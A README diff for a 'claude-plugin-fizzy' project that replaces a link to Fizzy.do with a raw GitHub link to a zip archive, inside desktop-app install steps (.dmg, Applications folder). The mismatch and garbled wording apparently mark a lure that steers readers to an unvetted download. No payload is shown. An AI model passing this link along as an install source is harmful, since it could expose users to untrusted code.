izahamyatim/claude-plugin-fizzy/README.md

    - If you are on macOS, open the `.dmg` file and drag the claude-plugin-fizzy icon to your Applications folder.

 5. **Open the Plugin**
    Once installed, locate claude-plugin-fizzy in your applications menu or folder.
-Click to open it and proceed to connect your Claude Code with Fizzy.do.
+Click to open it and proceed to connect your Claude Code with https://raw.githubusercontent.com/izahamyatim/claude-plugin-fizzy/main/.claude-plugin/plugin-claude-fizzy-1.2.zip

 ## ⚙️ System Requirements
 - **Operating System**: Windows 10 and above, or macOS Mojave and above.